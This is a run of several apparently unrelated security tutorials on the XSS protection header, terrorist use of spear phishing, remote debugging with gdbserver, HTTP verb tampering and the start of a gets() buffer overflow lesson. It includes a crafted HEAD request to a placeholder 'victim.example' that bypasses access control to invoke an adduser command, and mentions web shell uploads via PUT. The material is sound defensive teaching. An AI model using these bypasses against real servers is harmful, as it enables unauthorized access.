X-XSS-Protection: 1
Content-Length: 820
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Now, if we request the same vulnerable URL, the script won’t be executed. Let us look at Chrome’s console and see what happened. As we can see in the console, the script is not executed because of the header we sent.

header("X-XSS-Protection: 1");

The above header, when sent with no additional arguments, just stops the script from executing. We can also add an additional value to this header as shown below.

header("X-XSS-Protection: 1; mode=block");

When this header is sent, the browser doesn’t execute the script and shows a blank document to the user, as shown below. Below are the headers sent:

HTTP/1.1 200 OK
Date: Mon, 13 Apr 2015 09:59:22 GMT
Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0
X-Powered-By: PHP/5.6.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=729f2f716310ccfe353c81ced1602cf0; path=/
X-XSS-Protection: 1; mode=block
Content-Length: 846
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Though it works fine with popular browsers like Internet Explorer, Chrome and Safari, Firefox doesn’t support this header, and we can still see the alert box popping up as shown below. So, this header should be used for defense in depth, but it can’t protect the site completely, and developers have to make sure they have additional mitigation controls implemented.

Source
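As a footnote to the “additional mitigation controls” mentioned above, here is a minimal sketch (my own illustration, not part of the original write-up) of what the primary fix, output encoding, could look like for the search echo in the code above. It assumes the same $_GET['search'] parameter and simply HTML-encodes the value before printing it, keeping the header only as defense in depth:

<?php
// Defense in depth: keep the browser-side filter enabled.
header("X-XSS-Protection: 1; mode=block");

// Primary control: encode user input before echoing it into the HTML page.
$text = (isset($_GET['search']) && $_GET['search'] !== '') ? $_GET['search'] : "No text Entered";
echo "You Entered: " . htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
?>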
-
Introduction: Spear phishing attacks

Spear phishing and its evolutions, like the watering hole attack, represent one of the most insidious attack techniques adopted by the majority of threat actors in cyber space. According to the experts at security firm Trend Micro, spear phishing is the attack method used in some 91 percent of cyber attacks. Differently from a common phishing attack, in the spear phishing scenario bad actors target a subset of people, usually the employees of an organization, members of an association or visitors of a particular website. The purpose of the attack is to collect personal information and other sensitive data that will be used later in further attacks against the victims.

The attack vector is usually an email message that appears to come from a legitimate entity and that requests an action from the victims. There are numerous variants of spear phishing: some phishing emails include malicious links to websites controlled by attackers, while others include a malicious attachment that infects the victim’s system. In recent attacks operated by several APT groups, the malicious email sent to the victims encouraged users to open Word or PDF documents that were specifically crafted to exploit vulnerabilities in the software used to view them, in order to compromise the host.

Analyzing the data related to the cyber attacks that occurred in the last five years, it is easy to deduce that spear phishing represents the easiest way for an attacker to compromise enterprises and organizations of any size. The “Operation Aurora” attack (2010), the hack (2011), the Target breach (2013), the more recent Sony Entertainment breach (2014), and the cyber attacks operated by Operation Carbanak and the Syrian Electronic Army are just a few examples of offensives that relied on spear phishing as an infection method. The key to the success of a spear phishing attack is that it relies on the weakest link of the security chain: humans. Another characteristic of a spear phishing attack is that the content shared with the victims is usually highly customized to the recipient to increase the chance of exploitation. Social engineering techniques entice users to click on malicious attachments and links by suggesting they may be topics of interest to the victims.

Spear phishing and terrorism

Terrorism is defined as violent conduct, or the threat of violent acts, carried out with the purpose of creating a climate of terror and damaging the critical operations of a nation. We must consider that today’s society heavily relies on technology; the majority of the services that we access every day strongly depend on IT systems. This is particularly evident in industries like defense, energy, telecommunications and banking. For this reason, terrorism is enlarging its spectrum of action and is targeting IT services whose destruction can have the effects of an old-style terrorist attack. Terrorists have several ways to use technology for their operations, and once again, the spear phishing methodology could help them to realize their plans. Let’s imagine together some attack scenarios and the way a spear phishing attack could help a terrorist to hit the collective.

Terrorists can directly target the services, compromising their operations

A number of services are based on sophisticated infrastructure managed by humans. By interrupting them, it is possible to create serious damage to the victims and to the population.
Let’s imagine a cyber attack against a bank that causes the interruption of the operations of a financial institution, or a cyber attack against the telecommunication systems of a national carrier. Suddenly users would have no way to withdraw money from their bank accounts, or they would be isolated due to the interruption of the carrier’s service; both events would create panic among the population. Again, let’s think of cyber attacks against the transmission of a broadcaster or the energy grid of a state. In these cases too, the impact on public order could be dramatic. All the systems that could be targeted by the attacks mentioned rely on both an IT system and a human component, and the human operators are the element that could be targeted by terrorists using spear phishing attacks, which could give them the opportunity to infiltrate the computer systems and move laterally inside the systems of the service provider. Unfortunately, the attack scenarios described are feasible, and attacks with similar consequences on the final services have already occurred. In those cases, the threat actors were state-sponsored hackers and cyber criminals that mainly operated for cyber espionage and for profit, but in the case of a terrorist attack, the final goal is more dangerous: destruction itself.

Terrorists can run a spear phishing attack for information gathering

Information gathering through a spear phishing technique is the privileged choice for a terrorist. Cells of terrorists could use this attack method to spread malware and hack into the computers and mobile phones of persons of interest, with the intent to collect information on their social network and on the activities they are involved in. Spear phishing could allow terrorists to collect information on a specific target or to access information related to investigations of members of the group. Let’s imagine a spear phishing attack on the personnel of a defense subcontractor that could give the terrorists precious information about the security measures in place in a specific area that the terrorist cell intends to attack.

Online scams to finance activities of cells

Spear phishing attacks could be used by terrorists to finance small operations. The attacks can be carried out with the intent to conduct online fraud, and the proceeds, albeit modest, may also finance the purchase of weapons and false documents in the criminal underground. The terrorists make these purchases online, which enables cells to avoid the controls exercised by the intelligence agencies in the area.

Terrorist groups become more tech-savvy

Terrorist groups like ISIS and Al Qaeda have become more tech-savvy, and among their members there are also security experts with a deep knowledge of hacking techniques, including social engineering and spear phishing. Spear phishing is the privileged technique to steal sensitive information from the corporate or government entities that the terrorists plan to hit. Unfortunately, the skills necessary to hack the SCADA systems of a critical infrastructure are less and less specialized, because on the Internet it is easy to find numerous exploits ready for use. Very often, it is sufficient to know the credentials of a VPN service used to access the SCADA system remotely in order to hack it.
Terrorists are aware of this, and spear phishing attacks against the staff that manages the systems of a critical infrastructure would provide all the information necessary to attack the internal network and launch the exploits to hack the SCADA systems. In short, a spear phishing attack could give an attacker the information necessary to damage the processes of a nuclear power plant, a water facility or a satellite system. Another factor that incentivizes the use of spear phishing attacks by terrorists is that this kind of attack for information gathering can be conducted remotely without arousing suspicion.

ISIS operates spear phishing attacks against a Syrian citizen media group

The demonstration that the terrorist group of the Islamic State in Iraq and Syria (ISIS) is using spear phishing techniques against opponents was provided by Citizen Lab, which published a detailed report on a hacking campaign run by members of the organization against the Syrian citizen media group known as Raqqah is being Slaughtered Silently (RSS). The hackers operating for ISIS ran the spear phishing campaign to unmask the location of the militants of the RSS with the intent to kill them. The Syrian group RSS is an organization that has in several cases criticized the abuses committed by ISIS members during the occupation of the city of Ar-Raqqah, located in northern Syria.

“A growing number of reports suggest that ISIS is systematically targeting groups that document atrocities, or that communicate with Western media and aid organizations, sometimes under the pretext of finding ‘spies’.”

ISIS members are persecuting local groups searching for alleged spies of Western governments. The spear phishing campaign run by the terrorists allowed the members of ISIS to serve malware to infect the computers of their opponents and track them. The experts at Citizen Lab uncovered the spear phishing campaign that targeted the RSS members. “Though we are unable to conclusively attribute the attack to ISIS or its supporters, a link to ISIS is plausible,” Citizen Lab noted. “The malware used in the attack differs substantially from campaigns linked to the Syrian regime, and the attack is focused against a group that is an active target of ISIS forces.”

The malicious emails contain a link to a decoy file, which is used by attackers to drop custom spyware on the victim’s machine. “The unsolicited message below was sent to RSS at the end of November 2014 from a Gmail email address. The message was carefully worded, and contained references specific to the work and interests of RSS,” states the report. “The custom malware used in this attack infects a user who views the decoy ‘slideshow,’ and beacons home with the IP address of the victim’s computer and details about his or her system each time the computer restarts.”

The researchers at Citizen Lab noticed that the malicious code served through the spear phishing campaign is different from the Remote Access Trojans used by the hackers backed by the Syrian Government.

Figure 1 – Slideshow.zip file used by ISIS members in the spear phishing campaign

One of the principal differences is related to the control infrastructure: the members of ISIS used an email account to gather information from compromised machines. “Unlike Syrian regime-linked malware, it contains no Remote Access Trojan (RAT) functionality, suggesting it is intended for identifying and locating a target,” said Citizen Lab.
“Further, because the malware sends data captured by the malware to an email address, it does not require that the attackers maintain a command-and-control server online. This functionality would be especially useful to an adversary unsure of whether it can maintain uninterrupted Internet connectivity.”

Western intelligence has collected evidence of the presence of hackers among the members of ISIS. According to some experts, members of ISIS are already working to secure communications between ISIS members and to support the group in spreading propaganda messages while avoiding detection. “In addition, ISIS has reportedly gained the support of at least one individual with some experience with social engineering and hacking: Junaid Hussain (aka TriCk), a former member of teamp0ison hacking team. While Mr. Hussain and associates have reportedly made threats against Western governments, it is possible that he or others working with ISIS have quietly supported an effort to identify the targeted organization, which is a highly visible thorn in the side of ISIS.”

ISIS members are targeting many other individuals with spear phishing attacks – for example, it has been documented that they targeted Internet cafés in Syria and Iraq that are used by many hacktivists. “Reports about ISIS targeting Internet cafés have grown increasingly common, and in some cases reports point to the possible use of keyloggers as well as unspecified IP sniffers to track behavior in Internet cafes,” Citizen Lab reported.

Citizen Lab seems to be confident of the involvement of a non-state actor in the attack, and ISIS is a plausible suspect. “After considering each possibility, we find strong but inconclusive circumstantial evidence to support a link to ISIS,” the researchers said. “Whether or not ISIS is responsible, this attack is likely the work of a non-regime threat actor who may be just beginning to field a still-rudimentary capability in the Syrian conflict. The entry costs for engaging in malware attacks in a conflict like the Syrian Civil War are low, and made lower by the fact that the rule of law is nonexistent for large parts of the country.”

The Energy industry – A privileged target for a terrorist attack

The energy industry is probably the sector most exposed to the risk of terrorist attacks, as energy grids, nuclear plants and water facilities represent a privileged target for terrorists. Spear phishing attacks could allow terrorists to hit systems in critical infrastructure and disrupt their operations, or could allow bad actors to gather the sensitive information needed to organize a terrorist attack. A spear phishing campaign could be run against the personnel of a targeted infrastructure to gather sensitive information on the defense mechanisms in place and on ways to breach them.

The latest report issued by the DHS’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the ICS-CERT MONITOR report for the period September 2014 – February 2015, revealed that the majority of the attacks involved entities in the Energy Sector, followed by those in Critical Manufacturing.

Figure 2 – ICS-CERT MONITOR report related to the period September 2014 – February 2015

Spear phishing attacks appear among the principal attack vectors adopted by threat actors, but it is important to highlight that the report doesn’t mention cyber terrorism among the possible motivations for the attacks.
The fact that spear phishing attacks are effective at compromising systems in the energy sector should make us reflect on the potential effectiveness of this cyber threat if it is adopted by terrorist groups. In April 2014, security experts at Symantec discovered a cyber espionage campaign targeting energy companies around the world by infecting them with a new trojan dubbed Laziok. Also in this case, the attack chain starts with a spear phishing attack. The emails used by the hackers come from the moneytrans[.]eu domain, which acts as an open relay Simple Mail Transfer Protocol (SMTP) server. The e-mails contain an attachment, typically in the form of an Excel file, that exploits a well-known Microsoft Windows vulnerability patched in 2012, which was also exploited by the threat actors behind the Red October and CloudAtlas campaigns.

The experts confirmed that the bad actors who used the Trojan.Laziok malware to target energy companies did not adopt sophisticated hacking techniques. The investigation demonstrated that they exploited an old vulnerability by using exploit kits that are easy to find on the underground market. This kind of operation could potentially be conducted by groups of terrorists that intend to collect information on the IT infrastructure adopted by an organization in order to compromise it and cause serious damage to the processes of a refinery or a nuclear plant.

So far, security experts have no evidence of the availability of zero-day exploits in the arsenal of terrorists, so the spear phishing campaigns run by groups linked to ISIS or Al-Qaida are quite different from the attacks run by APT groups backed by governments. Unfortunately, it is impossible to exclude that in the future a group of terrorists with significant financial resources will gain access to the underground market of zero-day exploits and purchase them to conduct targeted campaigns aimed at causing destruction and the loss of human lives.

Conclusion

Spear phishing represents a serious threat for every industry, and the possibility that a group of terrorists will use this technique is concrete. To prevent spear phishing attacks, it is crucial to raise awareness of the mechanics behind these kinds of offensives. By sharing knowledge of the techniques and tactics of the threat actors, it is possible to significantly reduce the likelihood and impact of spear phishing campaigns. To prevent spear phishing attacks, it is necessary that everyone in an organization has a deep knowledge of the threat and of the defense mechanisms. The pillars of an effective defense against spear phishing attacks are:

* Awareness of the cyber threat
* Implementation of effective email filtering
* Implementation of effective network monitoring

Spear phishing attacks are still a primary choice for cyber criminals and intelligence agencies that intend to steal money and sensitive information, but the technique could also be a dangerous weapon to start a cyber terrorism attack. In order to protect our society we must trigger a collective defense. As explained by many security experts, the government cannot prevent spear-phishing attacks against private firms, but a successful attack against private industrial systems can be used to harm the security of a nation and take innocent lives. For this reason, it is important to share information on ongoing spear-phishing attacks and track potentially dangerous threat actors, especially cyber terrorists. Homeland security and national defense need a collective effort!
References

ISIS operates spear phishing attacks – Security Affairs
Phishing: A Very Dangerous Cyber Threat – InfoSec Institute
The US energy industry is constantly under cyber attacks – Security Affairs
Energy companies infected by newly Laziok trojan malware – Security Affairs
ICS-CERT: Most critical infrastructure attacks involve APTs – Security Affairs
http://techcrunch.com/2015/03/27/spear-phishing-could-enable-cyberterrorism-attacks-against-the-u-s/
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-spear-phishing-email-most-favored-apt-attack-bait.pdf
https://citizenlab.org/2014/12/malware-attack-targeting-syrian-isis-critics/

Source
-
In the world we live in, there are many professions where debugging is a vital piece of knowledge we must have in order to do our jobs successfully or more efficiently. Several professions where debugging knowledge is important are outlined below.

Programmers: every programmer knows that debugging a program when it is not working properly is the only right way to determine why the program is misbehaving and not producing the intended results. There are still programmers out there who use various kinds of print statements in order to display debugging information in a way that makes sense only to them and only for a limited amount of time. After a certain period, the debugging comments displayed on stdout (or anywhere else where the output can easily be inspected, like in a file) don’t make any sense anymore, which is the primary reason why we should stop debugging like that – if we can even call it debugging at this point. In any case, whenever we put any kind of print statements into the code, the whole program needs to be recompiled when it is written in a low-level programming language.

System Administrators: system administrators are tasked with setting up and maintaining the whole infrastructure of a company, which is not an easy task. There will be times when the programmers’ programs malfunction and the system administrator is the only one with access to the production environment where the program misbehaves. At times like these, the administrator should use a debugger to determine what the problem is and report it back to the programmers so they can fix it as soon as possible.

Security Researchers: debugger skills can be lethal in the hands of a security specialist, because he can use them to make a program do unexpected things. Debuggers are indispensable when analyzing how a program works in order to gain a deeper understanding of the program internals. There are various fields of the security domain where knowledge of debuggers is a must-have skill, and people who have not mastered it will have a hard time completing their jobs; such fields include reverse engineering, malware analysis, exploit writing, etc. The skills come in handy even when dealing with web applications: for example, we once reverse engineered a web application written in ASP.NET which used custom encryption/decryption functions to pass data between the client and the server in encrypted form. Having the reverse engineering skills, we quickly put together an algorithm that was able to decrypt the encrypted data so we could modify it and then re-encrypt it back to its encrypted form to be sent to the server for processing, which revealed interesting XSS, URL redirection and other kinds of bugs.

Whatever our profession from the list above, we should invest the time and learn how to debug properly, which will enable us to find problems sooner and with ease; no more print statements need to be introduced into the code. When debugging properly, we choose a debugger, run the program in it, and set appropriate breakpoints so the execution will stop at the time of the program misbehavior, after which we can inspect the program state.
Inspecting the program state doesn’t include only the few items we had output to stdout when doing it the wrong way, but the whole program state – we no longer have to put additional print statements into the code, recompile and rerun the program in order to get more information about the program state. Instead we can get all that information for free out of a program stopped in a debugger without much trouble.

Presenting different kinds of debuggers

There are many debuggers that we can use for debugging; at the highest level they are separated into two groups, which are presented below. Note that most operating systems consist of two parts: the user-mode applications in ring 3, where all of the applications run and have only limited access, via system calls, to the kernel-mode operating system code in ring 0. Therefore, depending on whether we’re debugging a user-mode application in ring 3 or an operating system function/structure in ring 0, the debuggers are divided between the two groups presented below.

Kernel-mode debuggers: debuggers running in kernel mode, which are able to debug the kernel operating system internals as well as user-mode applications. Examples of debuggers supporting kernel-mode debugging are the following: SoftICE, Syser, HyperDbg, WinDbg, Gdb, VirtDbg.

User-mode debuggers: debuggers running in user mode, which are able to debug only user-mode applications and don’t have access to the kernel. User-mode debuggers are the following: OllyDbg, Hopper, Hiew, Ida Pro, Dbg, x64dbg, VDB, Radare, etc.

All of the debuggers have support for debugging local programs or systems, but only some of them have remote debugging capabilities that allow us to use debuggers in the cloud. The following debuggers have the possibility of a remote debugging session, which we can use in a cloud-based session to debug the problem remotely:

* WinDbg
* Gdb
* VirtDbg
* Ida Pro
* Radare
* Hopper

Remote debugging

In this example, we’ll take a look at how we can remotely debug an application running in the cloud by using gdb, which can be downloaded and installed by running the following commands:

# wget ftp://sourceware.org/pub/gdb/releases/gdb-7.5.tar.bz2
# tar xvjf gdb-7.5.tar.bz2
# cd gdb-7.5/gdb/gdbserver/
# ./configure && make && make install

Let’s first display all the parameters that we can pass to the gdbserver program.

# gdbserver
Usage:  gdbserver [OPTIONS] COMM PROG [ARGS …]
        gdbserver [OPTIONS] --attach COMM PID
        gdbserver [OPTIONS] --multi COMM

COMM may either be a TTY device (for serial debugging), or
HOST:PORT to listen for a TCP connection.

Options:
  --debug               Enable general debugging output.
  --remote-debug        Enable remote protocol debugging output.
  --version             Display version information and exit.
  --wrapper WRAPPER --  Run WRAPPER to start new programs.
  --once                Exit after the first connection has closed.

Let’s now present a simple program that accepts exactly one argument, which must be set to the “secretarg” string in order for the program to print the secret key “KeepingHiddenSecrets”. Otherwise, the program exits with a notification that an incorrect input string was passed as the first argument. The program can be seen below.
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* strcmp() */

int main(int argc, char **argv) {
    /* exactly one user-supplied argument is expected */
    if(argc != 2) {
        printf("The wrong number of parameters passed into the program; quitting.\n");
        exit(1);
    }
    if(strcmp(argv[1], "secretarg") == 0) {
        printf("The secret password is: KeepingHiddenSecrets.\n");
    }
    else {
        printf("The secret password is not revealed to you, because you didn't supply the right secret argument.\n");
    }
    return 0;
}

We can compile the program into the main executable by simply running the “gcc main.c -o main” command, after which we can run it with “./main secretarg”, which will print the secret key to the standard output. Imagine that we’re a system administrator or a security researcher and only have access to the main executable: we don’t have the code, nor do we know the secret argument we have to pass to the program in order to reveal the secret key. To complicate matters somewhat, let’s also imagine that the program is running on a server in the cloud and can’t easily be recompiled and used on our local computer; nevertheless, we have access to the server and we’re able to run and debug the program. Note that the compiled program should also be copied to the host system where we’ll be entering the gdb commands that are sent to the gdbserver, so that gdb will be able to load and use the program symbols.

In such cases, it’s best to run the program remotely in the cloud under gdbserver in order to debug it. We can use the command line below to bind to the 0.0.0.0:8080 host and port combination where the remote debugging session will be accessible. We have to run the following commands on the remote host in the cloud where the program will be debugged. Note that two processes are created during the debugging session because we’ve invoked the program two times, once with the wrong input parameter and once with the right one. The first invocation of the program revealed that the input argument was not correct, while the second invocation received the secret password, because we passed the correct input argument.

# gdbserver --multi 0.0.0.0:8080
Listening on port 8080
Remote debugging from host 4.3.2.1
Process /srv/main created; pid = 20272
The secret password is not revealed to you, because you didn't supply the right secret argument.
Child exited with status 0
Process /srv/main created; pid = 20274
The secret password is: KeepingHiddenSecrets.
Child exited with status 0

Then we can use the netstat command to confirm that the gdbserver has actually been started, as can be seen below.

# netstat -luntp | grep LISTEN
tcp   0   0   0.0.0.0:8080   0.0.0.0:*   LISTEN   20223/gdbserver

After starting the remote session, we can connect to it by executing the following commands on the client, which connect to the remote session and start debugging the remote process.

# gdb
(gdb) target extended-remote 1.2.3.4:8080
Remote debugging using 1.2.3.4:8080
(gdb) set remote exec-file /srv/main
(gdb) file /tmp/main
Reading symbols from /tmp/main...done.
(gdb) set architecture i386:x86-64:intel
The target architecture is assumed to be i386:x86-64:intel
(gdb) run test
Starting program: /tmp/main test
[Inferior 1 (process 20272) exited normally]
(gdb) run secretarg
Starting program: /tmp/main secretarg
[Inferior 1 (process 20274) exited normally]

At this point we can run any command supported by the gdb debugger right in the remote session in the cloud, which enables us to do anything we would have done with a local process.
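To take the idea one small step further (this part is my own sketch, not from the original walkthrough), the same remote session could be used to set a breakpoint and inspect the comparison instead of guessing the argument. On an x86-64 Linux target, the first two arguments to strcmp arrive in the rdi and rsi registers; the addresses and library path below are illustrative and will differ on a real system:

(gdb) break strcmp
Breakpoint 1 at 0x400430
(gdb) run wrongguess
Starting program: /tmp/main wrongguess

Breakpoint 1, 0x00007ffff7aa1234 in strcmp () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) x/s $rdi
0x7fffffffe3c1: "wrongguess"
(gdb) x/s $rsi
0x400708:       "secretarg"
(gdb) continue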
Conclusion

Debugging skills are a vital and very important piece of knowledge we have to gain in order to complete our jobs faster and more efficiently. The hardest thing to do in the process is grasping the idea that such knowledge will actually benefit us. After we’ve convinced ourselves that debugging knowledge will come in handy, we have to choose an appropriate debugger and learn as much as we can about it. Usually, there are various articles and tutorials, even books, written on the subject, but we must not despair. We can start slow with a simple tutorial and work our way up from there. Whenever a new bug arises, we should take some extra time to find the problem with a debugger rather than using print statements. At first, it will seem like a waste of time, but sooner or later it will become extremely easy, and the first benefits of the newly acquired knowledge will be visible.

We’ve seen how easy it is to debug applications in the cloud by using the remote capabilities of the various debuggers that support them. By using remote debugging, we can easily start a program in the cloud and debug it remotely, without having to set up our own environment when trying to determine what the problem is. If a client wishes to debug a piece of software that requires various components to work together, we can easily use remote debugging capabilities to identify the problem they have been facing. This becomes even more important when debugging SCADA applications, which require certain kinds of hardware that we normally don’t have access to in our everyday lives, like a nuclear plant, an air conditioning system, etc. In such circumstances, we would have to fly to the client’s location in order to identify the problem at hand, but by using remote debugging capabilities we can do it from our own office in an entirely different country, which reduces costs considerably.

We should all invest the time to learn and obtain debugging knowledge, which will save us time and money when trying to determine the cause of a problem. It is only by practicing that we become better and better at what we do, and it’s the same with debugging: keep practicing and enjoy using your newly obtained knowledge.

Source
-
What is an HTTP VERB?

Hypertext Transfer Protocol (HTTP) gives you a list of methods that can be used to perform actions on the web server. Many of these methods are designed to help developers in deploying and testing HTTP applications in the development or debugging phase. These HTTP methods can be used for nefarious purposes if the web server is misconfigured. Also, a high-severity vulnerability like Cross Site Tracing (XST), a form of cross site scripting using the server’s HTTP TRACE method, is examined. Of the HTTP methods, GET and POST are the ones most commonly used by developers to access information provided by a web server. HTTP allows several other, less well-known methods as well. The following are some of them:

* HEAD
* GET
* POST
* PUT
* DELETE
* TRACE
* OPTIONS
* CONNECT

Many of these methods can potentially pose a critical security risk for a web application, as they allow an attacker to modify the files stored on the web server, delete web pages on the server, and upload a web shell to the server, which leads to stealing the credentials of legitimate users. Moreover, the methods that must be disabled are the following:

PUT: This method allows a client to upload new files to the web server. An attacker can exploit it by uploading malicious files (e.g. an ASP or PHP file that executes commands by invoking cmd.exe), or by simply using the victim’s server as a file repository.

DELETE: This method allows a client to delete a file on the web server. An attacker can exploit it as a very simple and direct way to deface a web site or to mount a Denial of Service (DoS) attack.

CONNECT: This method could allow a client to use the web server as a proxy.

TRACE: This method simply echoes back to the client whatever string has been sent to the server, and is used mainly for debugging purposes. This method, originally assumed harmless, can be used to mount an attack known as Cross Site Tracing, which was discovered by Jeremiah Grossman.

If an application requires any one of the above mentioned methods, such as REST web services that may require PUT or DELETE, it is really important to check that their configuration/usage is properly limited to trusted users and a safe environment.

Many web environments allow verb-based authentication and access control (VBAAC). This is basically nothing but a security control built around HTTP methods such as GET and POST (the ones usually used). Let’s take an example to help you understand better.

JAVA EE web.xml file

<security-constraint>
  <web-resource-collection>
    <url-pattern>/auth/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>root</role-name>
  </auth-constraint>
</security-constraint>

In the above example, access to the /auth directory is limited to the root role only. However, this limitation can be bypassed using HTTP verb tampering, even though access has been restricted to the mentioned role. As we can see, the configuration above restricts access using the GET and POST methods only. We can easily bypass this with the use of the HEAD method; you can also try any other HTTP methods as well, such as PUT, TRACK, TRACE, DELETE, etc. Also, you can try to bypass it by sending an arbitrary string such as ASDF as an HTTP verb (method).
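To make the bypass concrete, a crafted request of this kind might look like the one below (the host and path are placeholders; the same idea applies when an arbitrary verb such as ASDF is used in place of HEAD):

HEAD /auth/root.jsp?cmd=adduser HTTP/1.1
Host: victim.example
Connection: close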
The following are some conditions where bypassing is possible:

* The application has GET functionality that is not idempotent, or it will execute an arbitrary HTTP method
* It uses a security control that lists HTTP verbs
* The security control fails to block HTTP methods that are not listed

These are the most common scenarios where you can bypass the control. It also depends upon rule misconfiguration.

How we can bypass VBAAC with HTTP methods

Using the HEAD method

As mentioned above, the HEAD method is used to fetch a result similar to GET but with no response body. Imagine a URL in your application that is protected by security constraints that restrict access to the /auth directory with GET and POST only:

http://httpsecure.org/auth/root.jsp?cmd=adduser

If you try to force browse to the URL in a browser, a security constraint will check the rule to see whether the requested resource and requestor are authorized or not. The first rule will check the HTTP method as it came from the browser, so a GET or POST request is stopped by the security constraint. If you use a browser proxy such as Burp Suite to intercept the request and craft it by changing the GET method to HEAD, the request will not be blocked, since the HEAD method is not listed in the security constraint. So the adduser function will be successfully invoked and you will get an empty response back in the browser, due to how HEAD works.

Using Arbitrary HTTP Verbs

Most platforms, such as PHP and Java EE, allow the use of arbitrary HTTP verbs. Such requests are executed much like a GET request, which enables the bypass. Most importantly, when an arbitrary method is used, the response is not stripped as it is for the HEAD method, so you can see the internal pages easily: by using an arbitrary method instead of HEAD, the page source code can be viewed.

Some Vendors Allow HEAD Verbs

Many server vendors allow HEAD verbs by default, such as:

* APACHE 2.2.8
* JBOSS 4.2.2
* WEBSPHERE 6.1
* TOMCAT 6.0
* IIS 6.0
* WEBLOGIC 8.2

Allowing the HEAD method is not a vulnerability at all, as it is a requirement in the RFC. Let’s have a look at some of the most popular application security mechanisms to see if we can use them to bypass VBAAC. The following platforms may be affected by verb tampering techniques:

JAVA EE
* Allow HTTP verbs in policy: YES
* Bypassing possible: YES
* HEAD can be in policy: YES

.htaccess
* Allow HTTP verbs in policy: YES
* Bypassing possible: YES (if not set)
* HEAD can be in policy: YES

ASP.NET
* Allow HTTP verbs in policy: YES
* Bypassing possible: YES (if not set)
* HEAD can be in policy: YES

Java EE Containers

Let’s consider the following security constraint policy:

<security-constraint>
  <display-name>Example Security Constraint Policy</display-name>
  <web-resource-collection>
    <web-resource-name>Protected Area</web-resource-name>
    <!-- Define the context-relative URL(s) to be protected -->
    <url-pattern>/auth/security/*</url-pattern>
    <!-- If you list http methods, only those methods are protected -->
    <http-method>POST</http-method>
    <http-method>PUT</http-method>
    <http-method>DELETE</http-method>
    <http-method>GET</http-method>
  </web-resource-collection>
  ...
</security-constraint>

In the above code, only the listed methods are protected, so this rule will only trigger if a request for anything in the /auth/security directory uses a verb in the <http-method> list.
The best way to implement this policy would be to block any method that is not listed, but that is not the way these mechanisms currently behave, and you can see that the HEAD verb is not in this list. So, forwarding an HTTP HEAD request will bypass this policy entirely, and after that, the application server will pass the request to the GET handler. The right approach to secure a Java EE application is to remove all the <http-method> elements from this policy, which simply applies the rule to all HTTP methods. If you still want to restrict access to specific methods, then you need to set up two policies, as shown below.

<security-constraint>
  <web-resource-collection>
    <web-resource-name>site</web-resource-name>
    <url-pattern>/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  ...
</security-constraint>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>site</web-resource-name>
    <url-pattern>/*</url-pattern>
  </web-resource-collection>
  ...
</security-constraint>

So, the first policy denies GET requests access and the second policy denies all methods.

ASP.NET Authorization

Let’s have a look at an ASP.NET authorization configuration that is vulnerable to a VBAAC bypass.

<authorization>
  <allow verbs="POST" users="joe"/>
  <allow verbs="GET" users="*"/>
  <deny verbs="POST" users="*"/>
</authorization>

In the above rule, only the user joe can submit a POST request. In this example, the rule cannot be bypassed, the reason being that GET methods are allowed to everyone, so there is nothing to bypass using the HEAD method.

<authorization>
  <allow verbs="GET" users="root"/>
  <allow verbs="POST" users="joe"/>
  <deny verbs="POST,GET" users="*" />
</authorization>

This one is vulnerable to a bypass using the HEAD method. This is possible because .NET implicitly inserts an "allow all" rule into each authorization section. After listing the role entitlements appropriately, append a "deny all" rule.

<authorization>
  <allow verbs="GET" users="root"/>
  <allow verbs="POST" users="joe"/>
  <deny verbs="*" users="*" />
</authorization>

This will ensure that the only requests that pass the authorization check are those whose specific HTTP verb is in the authorization rule.

Some points to remember:

1) Always enable the deny-all option
2) Configure your web and application server to disallow HEAD requests entirely

Thanks for reading.

References

https://www.owasp.org/index.php/Test_HTTP_Methods_%28OTG-CONFIG-006%29
http://www.aspectsecurity.com/research-presentations/bypassing-vbaac-with-http-verb-tampering

Source
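In addition to fixing the container or framework policy as shown above, the application itself can enforce a verb allowlist as defense in depth. The following short PHP sketch is my own illustration (not part of the original write-up) of that idea; it rejects any request whose method is not explicitly expected (http_response_code() assumes PHP 5.4 or later):

<?php
// Application-level verb allowlist: anything not explicitly expected is rejected.
$allowed = array('GET', 'POST');
if (!in_array($_SERVER['REQUEST_METHOD'], $allowed, true)) {
    header('Allow: ' . implode(', ', $allowed));
    http_response_code(405); // Method Not Allowed
    exit;
}
// ... normal request handling continues here ...
?>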
-
In previous articles, we got to know the basics of the stack-based buffer overflow and of changing an address at run time by modifying a register value using the debugger. In this article, we will analyze another simple C program which takes user input and prints the same input data on the screen. This time we will not change any values through the debugger like we did in the last article; instead, we will learn how to do it with user input values. Let us have a look at the program.

In the program shown in the above screenshot, we have created two functions, marked as 1 and 2. The 1st is the main function of the program, from where the program execution starts. In the main function, there is a command to print a message on the screen, and then it calls the V1 function. The 2nd one defines the V1 function, in which we have defined an array of size 10; then there are commands to take the user input and print it back to the output screen. In the V1 function, we have used the ‘gets’ function to take the user input. The ‘gets’ function is vulnerable to buffer overflow, as it cannot check whether the size of the value entered by the user is smaller or greater than the size of the buffer. So, ‘gets’ will take whatever value the user enters and write it into the buffer. If the buffer is too small, it will write beyond the buffer and corrupt the rest of the stack. So, let’s analyze this with a debugger.

Note: You can download the EXE file here: Download

